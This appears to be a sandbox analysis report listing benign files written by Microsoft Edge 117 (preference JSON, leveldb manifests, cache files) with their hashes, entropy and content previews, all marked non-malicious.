                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):30130
                                Entropy (8bit):5.567426444350437
                                Encrypted:false
                                SSDEEP:768:BSHFtmLoLKPSWPgSfrL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaSpnfuirwl9pAtuL:BSHFt8WKPSWPgSfrLu1ja/SpfuHlstA
                                MD5:73013A4A5A78C2533354A63847D8B9E9
                                SHA1:18785C0A8D96C1AF9C337BD7B10D01E8FF82BEAC
                                SHA-256:76BCE785C2D30F1DBA66A00D4CA446AE78343715A27F262448F18E415D9D8FE4
                                SHA-512:41B4E10F3220CEB7F5831B56EF6E4B88312478B0F45E2668AFB6AF799757F8FE7C5AF39EECC19A5424A04CDEA9CD271380706DA4D77E138538E672A0344E7E25
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):9160
                                Entropy (8bit):5.178979613597635
                                Encrypted:false
                                SSDEEP:96:sVSqlPJ1Ceb9bsYrdvXmc9bkO1LVBXZYYYsY5Th6Cp9/x+6M8muecmAeChe4zvrI:sVSUJIYrdvtf56YYsYPpj+FVAFUFBf
                                MD5:412D62961B0AE94821E7430E47BE37A4
                                SHA1:07D1431CA89E78DF5B89C5B6F8E41ED40B34CEB7
                                SHA-256:575C80197E64DAB10CEA36A93441081E858438B2B2EBB07B7406E8436587C35F
                                SHA-512:8A0399C7F4051ACD8ED2B83AED5B4ADD391BF0E4F50CC65CC6BDF8F258D080FD73450F74D1CED3EA133E75BB83A2F64CE12660566C8AA8D11C7750A9A013562F
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlA/:Ls3A/
                                MD5:C255E02AFC17F19A3083D6EFB7780D80
                                SHA1:783EA7AC08AA1451B1788ED807D210465785F0E3
                                SHA-256:DA3435B9C990D717114F91092D7006F0A0E1ABA86D35629249B95B58A4A58574
                                SHA-512:E7E2414B94167DD73BE87352AB51C3277D19267BD0F069A4C639F6E96F2FFFEEE21E583054EF9A910D090A58FB96D50E2BBC01AFEE92960F65B1F76C1EDE5512
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlAqlI/l:Ls3Aqq/l
                                MD5:68F430C349A3C7AC23E9AC0CED084ADC
                                SHA1:3063A502DDC8939773A50FBAFB59FAF3E0698FD2
                                SHA-256:92F6193A671D8A80158EB51F3DB03D9F3D3162E63AAACE28A907E4C11E47A427
                                SHA-512:273CE115785CE9D35DF1ECF3B4A0A90AE194EC3C571C52AE78A9BD4A59ED9D5EBB56F8DF6B9CD13D4B327109845B0C7EEB420D3C16247463CF06FCBC5448ED37
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):120
                                Entropy (8bit):3.32524464792714
                                Encrypted:false
                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                MD5:A397E5983D4A1619E36143B4D804B870
                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                Malicious:false
                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):13
                                Entropy (8bit):2.7192945256669794
                                Encrypted:false
                                SSDEEP:3:NYLFRQI:ap2I
                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                Malicious:false
                                Preview:117.0.2045.47
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
